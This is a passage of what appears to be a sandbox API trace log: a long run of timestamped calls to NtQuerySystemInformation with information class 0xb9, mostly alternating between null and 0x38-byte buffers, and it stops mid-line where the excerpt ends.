[0234.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x38, ResultLength=0x0) [0234.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x38, ResultLength=0x0) [0234.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x38, ResultLength=0x0) [0234.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x38, ResultLength=0x0) [0234.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8e0, Length=0x40, ResultLength=0x0) [0234.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.005] NtQuerySystemInformation 